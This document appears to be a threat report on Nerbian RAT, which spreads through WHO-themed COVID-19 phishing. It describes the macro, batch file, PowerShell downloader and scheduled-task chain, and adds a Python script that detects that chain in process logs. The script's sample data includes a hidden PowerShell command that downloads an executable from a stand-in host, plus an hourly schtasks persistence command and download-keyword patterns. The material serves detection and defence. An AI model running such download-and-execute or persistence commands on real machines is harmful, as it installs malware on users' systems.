A new Remote Access Trojan (RAT) was discovered being delivered via phishing campaigns that impersonate the World Health Organization (WHO) and send the target COVID-19 related information. This RAT, dubbed Nerbian RAT, is written in Go and includes a large number of anti-analysis mechanisms to help prevent it from being run in a sandboxed or virtualized environment.
The phishing emails seen from this campaign have included a Microsoft Word document, either directly attached or within an attached RAR file. These Word documents contain malicious macros that, when executed, drop a batch file onto the device and run it. This batch file contains a PowerShell command that downloads an executable file and executes it. This executable file is packed with the UPX utility and functions as the dropper for the main Nerbian RAT payload. The dropper is what contains the large set of anti-analysis checks, including checking whether certain reverse engineering or debugging programs are running, looking for suspicious MAC addresses, checking for small hard disk sizes, and so on.
The dropper then downloads the main Nerbian RAT payload and creates a scheduled task to establish persistence, executing the main payload hourly. Nerbian RAT contains functionality similar to other RATs, including command execution, keylogging, and screen capturing.
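As an added illustration (not from the original report), the following Python script flags the infection chain described above in process-creation telemetry: Word spawning a batch file via cmd.exe, PowerShell downloading an executable beneath that Office process, and schtasks creating an hourly task. The Sysmon-style event layout, the sample rows and the URL are constructed assumptions.

```python
import re
from typing import Dict, List, Tuple

Event = Tuple[int, int, str, str]  # (pid, ppid, image path, command line)

# Constructed sample telemetry resembling Sysmon Event ID 1 fields (not real data).
SAMPLE_EVENTS: List[Event] = [
    (100, 1, r"C:\Program Files\Microsoft Office\WINWORD.EXE", "WINWORD.EXE /n who_covid_update.docx"),
    (101, 100, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c C:\Users\u\AppData\Local\Temp\update.bat"),
    (102, 101, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "powershell -w hidden (New-Object Net.WebClient).DownloadFile('http://example.invalid/u.exe','C:\\Users\\u\\AppData\\Local\\Temp\\u.exe')"),
    (103, 102, r"C:\Users\u\AppData\Local\Temp\u.exe", "u.exe"),
    (104, 103, r"C:\Windows\System32\schtasks.exe", "schtasks /create /sc hourly /tn Updater /tr C:\\Users\\u\\AppData\\Local\\Temp\\p.exe"),
    (200, 1, r"C:\Windows\explorer.exe", "explorer.exe"),          # benign activity
    (201, 200, r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),  # benign activity
]

OFFICE_RE = re.compile(r"\\(winword|excel|powerpnt)\.exe$", re.I)
DOWNLOAD_RE = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b", re.I)

def _name(image: str) -> str:
    return image.rsplit("\\", 1)[-1].lower()

def _has_office_ancestor(pid: int, by_pid: Dict[int, Event]) -> bool:
    """Walk up the parent chain and report whether an Office process sits above it."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        if OFFICE_RE.search(by_pid[pid][2]):
            return True
        pid = by_pid[pid][1]
    return False

def detect(events: List[Event]) -> List[Tuple[str, int]]:
    """Return (rule, pid) findings for the macro -> batch -> PowerShell download -> hourly task chain."""
    by_pid = {e[0]: e for e in events}
    findings = []
    for pid, ppid, image, cmd in events:
        name = _name(image)
        parent = by_pid.get(ppid)
        if name == "cmd.exe" and ".bat" in cmd.lower() and parent and OFFICE_RE.search(parent[2]):
            findings.append(("office_macro_runs_batch", pid))
        elif name == "powershell.exe" and DOWNLOAD_RE.search(cmd) and _has_office_ancestor(ppid, by_pid):
            findings.append(("powershell_download_under_office", pid))
        elif name == "schtasks.exe" and re.search(r"/sc\s+hourly", cmd, re.I) and _has_office_ancestor(ppid, by_pid):
            findings.append(("hourly_task_under_office", pid))
    return findings

if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid {pid}")
```

Each rule requires an Office ancestor so ordinary cmd.exe or schtasks use from a desktop session is not flagged; the three findings together reconstruct the full chain from one set of events.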